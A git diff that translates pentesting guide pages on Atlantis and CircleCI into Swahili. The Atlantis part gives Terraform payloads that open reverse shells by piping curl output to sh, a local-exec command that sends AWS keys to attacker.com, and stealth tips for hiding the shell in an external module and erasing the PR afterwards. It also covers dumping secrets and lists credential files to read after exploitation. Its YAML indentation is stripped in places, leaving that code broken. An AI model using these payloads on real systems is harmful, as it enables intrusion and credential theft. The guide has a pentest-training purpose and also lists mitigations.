+Kwa kawaida Atlantis itafanya kazi **ukurasa wa wavuti katika bandari 4141 kwenye localhost**. Ukurasa huu unaruhusu tu kuwezesha/kuzima atlantis apply na kuangalia hali ya mpango wa repos na kuziweka wazi (hauruhusu kubadilisha mambo, hivyo si ya manufaa sana).
-You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
+Huenda usiione ikifichuliwa kwa mtandao, lakini inaonekana kwa kawaida **hakuna akreditif zinazohitajika** kuifikia (na ikiwa zipo `atlantis`:`atlantis` ndio **za kawaida**).
### Server Configuration
-Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
+Usanidi wa `atlantis server` unaweza kuainishwa kupitia bendera za mistari ya amri, mabadiliko ya mazingira, faili ya usanidi au mchanganyiko wa tatu.
-- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
-- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
+- Unaweza kupata [**hapa orodha ya bendera**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) zinazosaidiwa na seva ya Atlantis
+- Unaweza kupata [**hapa jinsi ya kubadilisha chaguo la usanidi kuwa mabadiliko ya mazingira**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
-Values are **chosen in this order**:
+Thamani zinachaguliwa **katika mpangilio huu**:
-1. Flags
-2. Environment Variables
-3. Config File
+1. Bendera
+2. Mabadiliko ya Mazingira
+3. Faili ya Usanidi
> [!WARNING]
-> Note that in the configuration you might find interesting values such as **tokens and passwords**.
+> Kumbuka kwamba katika usanidi unaweza kupata thamani za kuvutia kama **tokens na nywila**.
#### Repos Configuration
-Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
+Mikakati fulani inaathiri **jinsi repos inavyosimamiwa**. Hata hivyo, inawezekana kwamba **kila repo inahitaji mipangilio tofauti**, hivyo kuna njia za kuainisha kila repo. Hii ndiyo kipaumbele:
-1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
- 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
-2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
-3. **Default** values
+1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) faili. Faili hii inaweza kutumika kuainisha jinsi atlantis inavyopaswa kutenda kwa repo. Hata hivyo, kwa kawaida funguo fulani haziwezi kuainishwa hapa bila bendera fulani zinazoruhusu.
+1. Huenda ikahitajika kuruhusiwa na bendera kama `allowed_overrides` au `allow_custom_workflows`
+2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): Unaweza kuipitia na bendera `--repo-config` na ni yaml inayopanga mipangilio mipya kwa kila repo (regexes zinasaidiwa)
+3. **Thamani za Kawaida**
**PR Protections**
-Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
+Atlantis inaruhusu kuashiria ikiwa unataka **PR** kuidhinishwa na mtu mwingine (hata kama hiyo haijakubaliwa katika ulinzi wa tawi) na/au kuwa **`mergeable`** (ulinzi wa tawi umepita) **kabla ya kuendesha apply**. Kutoka kwa mtazamo wa usalama, kuweka chaguo zote mbili ni mapendekezo.
-In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
+Katika kesi `allowed_overrides` ni Kweli, mipangilio hii inaweza **kufutwa kwenye kila mradi na faili ya `/atlantis.yml`**.
**Scripts**
-The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
+Usanidi wa repo unaweza **kuainisha scripts** za kuendesha [**kabla**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) na [**baada**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) **workflow inatekelezwa.**
-There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file.
+Hakuna chaguo la kuruhusu **kuainisha** scripts hizi katika **repo `/atlantis.yml`** faili.
**Workflow**
-In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
-Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
+Katika usanidi wa repo (usanidi wa upande wa seva) unaweza [**kuainisha workflow mpya ya kawaida**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), au [**kuunda workflows mpya za kawaida**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** Unaweza pia **kuainisha** ni **repos** zipi zinaweza **kufikia** zile **mpya** zilizoundwa.\
+Kisha, unaweza kuruhusu faili ya **atlantis.yaml** ya kila repo ku **ainisha workflow ya kutumia.**
> [!CAUTION]
-> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
-> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
+> Ikiwa bendera [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) `allow_custom_workflows` imewekwa kuwa **Kweli**, workflows zinaweza **kuainishwa** katika faili ya **`atlantis.yaml`** ya kila repo. Pia inaweza kuwa muhimu kwamba **`allowed_overrides`** pia inasisitiza **`workflow`** ili **kufuta workflow** ambayo itatumika.\
+> Hii itatoa **RCE katika seva ya Atlantis kwa mtumiaji yeyote anayeweza kufikia repo hiyo**.
>
> ```yaml
> # atlantis.yaml
@@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor
**Conftest Policy Checking**
-Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include:
+Atlantis inasaidia kuendesha **server-side** [**conftest**](https://www.conftest.dev/) **policies** dhidi ya matokeo ya mpango. Matumizi ya kawaida ya hatua hii ni pamoja na:
-- Denying usage of a list of modules
-- Asserting attributes of a resource at creation time
-- Catching unintentional resource deletions
-- Preventing security risks (ie. exposing secure ports to the public)
+- Kukataa matumizi ya orodha ya moduli
+- Kuashiria sifa za rasilimali wakati wa kuunda
+- Kukamata kufutwa kwa rasilimali zisizokusudiwa
+- Kuzuia hatari za usalama (yaani, kufichua bandari salama kwa umma)
-You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
+Unaweza kuangalia jinsi ya kuipanga katika [**nyaraka**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
### Atlantis Commands
-[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
-
+[**Katika nyaraka**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) unaweza kupata chaguzi unazoweza kutumia kuendesha Atlantis:
```bash
# Get help
atlantis help
@@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags]
## --verbose
## You can also add extra terraform options
```
-
### Attacks
> [!WARNING]
-> If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
-
-You can fix it by running:
+> Ikiwa wakati wa unyakuzi unakutana na **kosa** hili: `Error: Error acquiring the state lock`
+Unaweza kulitatua kwa kukimbia:
```
atlantis unlock #You might need to run this in a different PR
atlantis plan -- -lock=false
```
+#### Atlantis plan RCE - Mabadiliko ya usanidi katika PR mpya
-#### Atlantis plan RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
-
-You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
+Ikiwa una ruhusa ya kuandika juu ya hifadhi, utaweza kuunda tawi jipya ndani yake na kuunda PR. Ikiwa unaweza **kutekeleza `atlantis plan`** (au labda inatekelezwa kiotomatiki) **utaweza kufanya RCE ndani ya seva ya Atlantis**.
+Unaweza kufanya hivi kwa kufanya [**Atlantis ipokee chanzo cha data cha nje**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Weka tu payload kama ifuatavyo katika faili ya `main.tf`:
```json
data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
+**Shambulio la Siri**
-**Stealthier Attack**
-
-You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+Unaweza kufanya shambulio hili hata kwa njia **ya siri zaidi**, kwa kufuata mapendekezo haya:
+- Badala ya kuongeza rev shell moja kwa moja kwenye faili ya terraform, unaweza **kupakia rasilimali ya nje** ambayo ina rev shell:
```javascript
module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
-
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
-- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
+- Katika rasilimali ya nje, tumia kipengele cha **ref** kuficha **kodi ya rev shell ya terraform katika tawi** ndani ya repo, kitu kama: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- **Badala** ya kuunda **PR kwa master** ili kuanzisha Atlantis, **unda matawi 2** (test1 na test2) na uunde **PR kutoka moja hadi nyingine**. Unapokamilisha shambulio, tu **ondoa PR na matawi**.
#### Atlantis plan Secrets Dump
-You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
-
+Unaweza **dump secrets zinazotumiwa na terraform** ukikimbia `atlantis plan` (`terraform plan`) kwa kuweka kitu kama hiki katika faili la terraform:
```json
output "dotoken" {
- value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
}
```
+#### Atlantis apply RCE - Mabadiliko ya usanidi katika PR mpya
-#### Atlantis apply RCE - Config modification in new PR
+Ikiwa una ruhusa ya kuandika juu ya hifadhi, utaweza kuunda tawi jipya na kuzalisha PR. Ikiwa unaweza **kufanya `atlantis apply` utaweza RCE ndani ya seva ya Atlantis**.
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
+Hata hivyo, kwa kawaida utahitaji kupita baadhi ya ulinzi:
-However, you will usually need to bypass some protections:
-
-- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
- - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-
-Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
+- **Inayoweza kuunganishwa**: Ikiwa ulinzi huu umewekwa katika Atlantis, unaweza tu kufanya **`atlantis apply` ikiwa PR inaweza kuunganishwa** (hii inamaanisha kuwa ulinzi wa tawi unahitaji kupitishwa).
+- Angalia [**kupita kwa ulinzi wa tawi**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+- **Imeidhinishwa**: Ikiwa ulinzi huu umewekwa katika Atlantis, **mtumiaji mwingine lazima aidhinishe PR** kabla hujaweza kufanya `atlantis apply`
+- Kwa kawaida unaweza kutumia [**token ya Gitbot kupita ulinzi huu**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+Kufanya **`terraform apply` kwenye faili ya Terraform yenye nia mbaya na** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+Unahitaji tu kuhakikisha kuwa payload kama hizi zinaishia kwenye faili ya `main.tf`:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
}
```
-
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
+Fuata **mapendekezo kutoka kwa mbinu ya awali** ili kufanikisha shambulio hili kwa **njia ya siri**.
#### Terraform Param Injection
-When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
-
+Wakati wa kuendesha `atlantis plan` au `atlantis apply`, terraform inatekelezwa chini, unaweza kupitisha amri kwa terraform kutoka atlantis kwa kuandika kitu kama:
```bash
atlantis plan --
atlantis plan -- -h #Get terraform plan help
@@ -256,7 +243,6 @@ atlantis plan -- -h #Get terraform plan help
atlantis apply --
atlantis apply -- -h #Get terraform apply help
```
-
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
#### Custom Workflow
@@ -289,96 +275,94 @@ This possibility was mentioned in a previous section:
#### Bypass plan/apply protections
If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**.
-
```yaml
repos:
- - id: /.*/
- apply_requirements: []
+- id: /.*/
+apply_requirements: []
```
-
#### PR Hijacking
-If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
+Ikiwa mtu atatuma **`atlantis plan/apply` maoni kwenye ombi lako halali la kuvuta,** itasababisha terraform kuendesha wakati hutaki.
-Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
+Zaidi ya hayo, ikiwa huna mipangilio katika **branch protection** ya kuomba **kuangalia upya** kila PR wakati **commit mpya inatolewa** kwake, mtu anaweza **kuandika mipangilio ya uharibifu** (angalia hali za awali) katika mipangilio ya terraform, kuendesha `atlantis plan/apply` na kupata RCE.
-This is the **setting** in Github branch protections:
+Hii ni **mipangilio** katika ulinzi wa matawi ya Github:
.png>)
#### Webhook Secret
-If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
+Ikiwa umeweza **kuiiba webhook secret** inayotumika au ikiwa **hakuna webhook secret** inayotumika, unaweza **kuita webhook ya Atlantis** na **kuitisha amri za atlantis** moja kwa moja.
#### Bitbucket
-Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
+Bitbucket Cloud haifai **webhook secrets**. Hii inaweza kuruhusu washambuliaji **kuiga maombi kutoka Bitbucket**. Hakikisha unaruhusu tu IP za Bitbucket.
-- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
-- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
-- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
+- Hii inamaanisha kwamba **mshambuliaji** anaweza kufanya **maombi ya uongo kwa Atlantis** ambayo yanaonekana kana kwamba yanatoka Bitbucket.
+- Ikiwa unataja `--repo-allowlist` basi wanaweza tu kuiga maombi yanayohusiana na hizo repos hivyo uharibifu mkubwa wanaoweza kufanya ni kupanga/kutumia kwenye repos zako.
+- Ili kuzuia hili, ruhusu [anwani za IP za Bitbucket](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (angalia Anwani za IPv4 za Nje).
### Post-Exploitation
-If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
+Ikiwa umeweza kupata ufikiaji wa seva au angalau umepata LFI kuna mambo ya kuvutia unapaswa kujaribu kusoma:
-- `/home/atlantis/.git-credentials` Contains vcs access credentials
-- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
-- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file
- - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
-- `/proc/1/environ` Env variables
-- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
+- `/home/atlantis/.git-credentials` Inashikilia akreditif za ufikiaji wa vcs
+- `/atlantis-data/atlantis.db` Inashikilia akreditif za ufikiaji wa vcs na maelezo zaidi
+- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Faili ya hali ya terraform
+- Mfano: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
+- `/proc/1/environ` Mabadiliko ya mazingira
+- `/proc/[2-20]/cmdline` Cmd line ya `atlantis server` (inaweza kuwa na data nyeti)
### Mitigations
-#### Don't Use On Public Repos
+#### Usitumie Kwenye Repos za Umma
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
+Kwa sababu mtu yeyote anaweza kutoa maoni kwenye ombi za kuvuta za umma, hata na mipango yote ya usalama iliyopo, bado ni hatari kuendesha Atlantis kwenye repos za umma bila mipangilio sahihi ya mipangilio ya usalama.
-#### Don't Use `--allow-fork-prs`
+#### Usitumie `--allow-fork-prs`
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
+Ikiwa unafanya kazi kwenye repo ya umma (ambayo haitashauriwa, angalia hapo juu) huwezi kuweka `--allow-fork-prs` (inarejelea kuwa si kweli) kwa sababu mtu yeyote anaweza kufungua ombi la kuvuta kutoka kwa fork yao hadi repo yako.
#### `--repo-allowlist`
-Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
+Atlantis inahitaji uweze kutaja orodha ya ruhusa ya repos itakazokubali webhooks kutoka kupitia bendera ya `--repo-allowlist`. Kwa mfano:
-- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-- Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
-- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
-- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+- Repos maalum: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+- Shirika lako lote: `--repo-allowlist=github.com/runatlantis/*`
+- Kila repo katika usakinishaji wako wa GitHub Enterprise: `--repo-allowlist=github.yourcompany.com/*`
+- Repos zote: `--repo-allowlist=*`. Inatumika wakati uko kwenye mtandao uliohifadhiwa lakini hatari bila pia kuweka webhook secret.
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+Bendera hii inahakikisha usakinishaji wako wa Atlantis haujatumika na repos usizodhibiti. Angalia `atlantis server --help` kwa maelezo zaidi.
-#### Protect Terraform Planning
+#### Linda Mipango ya Terraform
-If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
+Ikiwa washambuliaji wanawasilisha maombi ya kuvuta na msimbo wa uharibifu wa Terraform uko katika mfano wako wa tishio basi lazima uwe na ufahamu kwamba idhini za `terraform apply` hazitoshi. Inawezekana kuendesha msimbo wa uharibifu katika `terraform plan` kwa kutumia [chanzo cha data cha `external`](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) au kwa kutaja mtoa huduma wa uharibifu. Msimbo huu unaweza kisha kuhamasisha akreditif zako.
-To prevent this, you could:
+Ili kuzuia hili, unaweza:
-1. Bake providers into the Atlantis image or host and deny egress in production.
-2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
-3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
+1. Kuunda mtoa huduma ndani ya picha ya Atlantis au mwenyeji na kukataa egress katika uzalishaji.
+2. Tekeleza itifaki ya rejista ya mtoa huduma ndani na kukataa egress ya umma, kwa njia hiyo unadhibiti nani ana ufikiaji wa kuandika kwenye rejista.
+3. Badilisha [mipangilio ya repo upande wa seva](https://www.runatlantis.io/docs/server-side-repo-config.html)'s hatua ya `plan` ili kuthibitisha dhidi ya matumizi ya watoa huduma au vyanzo vya data vilivyokatazwa au PRs kutoka kwa watumiaji wasioruhusiwa. Unaweza pia kuongeza uthibitisho wa ziada katika hatua hii, kwa mfano, kuhitaji "thumbs-up" kwenye PR kabla ya kuruhusu `plan` kuendelea. Conftest inaweza kuwa ya manufaa hapa.
#### Webhook Secrets
-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+Atlantis inapaswa kuendeshwa na Webhook secrets zilizowekwa kupitia mabadiliko ya mazingira ya `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET`. Hata na bendera ya `--repo-allowlist` iliyowekwa, bila webhook secret, washambuliaji wanaweza kufanya maombi kwa Atlantis wakijifanya kama repo ambayo imeorodheshwa. Webhook secrets zinahakikisha kwamba maombi ya webhook yanatoka kwa mtoa huduma wako wa VCS (GitHub au GitLab).
-If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
+Ikiwa unatumia Azure DevOps, badala ya webhook secrets ongeza jina la mtumiaji wa msingi na nenosiri.
#### Azure DevOps Basic Authentication
-Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
+Azure DevOps inasaidia kutuma kichwa cha uthibitishaji wa msingi katika matukio yote ya webhook. Hii inahitaji kutumia URL ya HTTPS kwa eneo lako la webhook.
#### SSL/HTTPS
-If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
+Ikiwa unatumia webhook secrets lakini trafiki yako iko juu ya HTTP basi webhook secrets zinaweza kuibiwa. Wezesha SSL/HTTPS kwa kutumia bendera za `--ssl-cert-file` na `--ssl-key-file`.
-#### Enable Authentication on Atlantis Web Server
+#### Wezesha Uthibitishaji kwenye Seva ya Mtandao ya Atlantis
-It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
+Inashauriwa sana kuwezesha uthibitishaji katika huduma ya wavuti. Wezesha BasicAuth kwa kutumia `--web-basic-auth=true` na weka jina la mtumiaji na nenosiri kwa kutumia bendera za `--web-username=yourUsername` na `--web-password=yourPassword`.
-You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
+Unaweza pia kupitisha hizi kama mabadiliko ya mazingira `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` na `ATLANTIS_WEB_PASSWORD=yourPassword`.
### References
@@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true`
- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md
index 8b8a1fea1..fdb61bab0 100644
--- a/src/pentesting-ci-cd/circleci-security.md
+++ b/src/pentesting-ci-cd/circleci-security.md
@@ -4,256 +4,232 @@
### Basic Information
-[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
+[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) ni jukwaa la Uunganishaji Endelevu ambapo unaweza **kufafanua mifano** inayoonyesha unachotaka ifanye na baadhi ya msimbo na lini ifanye hivyo. Kwa njia hii unaweza **kujiandaa kwa majaribio** au **kupeleka** moja kwa moja **kutoka kwa tawi kuu la repo yako** kwa mfano.
### Permissions
-**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
-In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
+**CircleCI** **inapata ruhusa** kutoka github na bitbucket zinazohusiana na **akaunti** inayojiandikisha.\
+Katika majaribio yangu nilikagua kwamba kadri unavyo kuwa na **ruhusa za kuandika juu ya repo katika github**, utaweza **kusimamia mipangilio ya mradi wake katika CircleCI** (weka funguo mpya za ssh, pata funguo za api za mradi, tengeneza matawi mapya na mipangilio mipya ya CircleCI...).
-However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
+Hata hivyo, unahitaji kuwa **admin wa repo** ili **kubadilisha repo kuwa mradi wa CircleCI**.
### Env Variables & Secrets
-According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
+Kulingana na [**nyaraka**](https://circleci.com/docs/2.0/env-vars/) kuna njia tofauti za **kupanua thamani katika mabadiliko ya mazingira** ndani ya mchakato.
#### Built-in env variables
-Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
+Kila kontena linalotumiwa na CircleCI litakuwa na [**mabadiliko maalum ya mazingira yaliyofafanuliwa katika nyaraka**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) kama `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` au `CIRCLE_USERNAME`.
#### Clear text
-You can declare them in clear text inside a **command**:
-
+Unaweza kuyatangaza kwa maandiko wazi ndani ya **amri**:
```yaml
- run:
- name: "set and echo"
- command: |
- SECRET="A secret"
- echo $SECRET
+name: "set and echo"
+command: |
+SECRET="A secret"
+echo $SECRET
```
-
-You can declare them in clear text inside the **run environment**:
-
+Unaweza kutangaza hizo kwa maandiko wazi ndani ya **run environment**:
```yaml
- run:
- name: "set and echo"
- command: echo $SECRET
- environment:
- SECRET: A secret
+name: "set and echo"
+command: echo $SECRET
+environment:
+SECRET: A secret
```
-
-You can declare them in clear text inside the **build-job environment**:
-
+Unaweza kutangaza hizo kwa maandiko wazi ndani ya **build-job environment**:
```yaml
jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
```
-
-You can declare them in clear text inside the **environment of a container**:
-
+Unaweza kutangaza hizo kwa maandiko wazi ndani ya **mazingira ya kontena**:
```yaml
jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
```
+#### Siri za Mradi
-#### Project Secrets
-
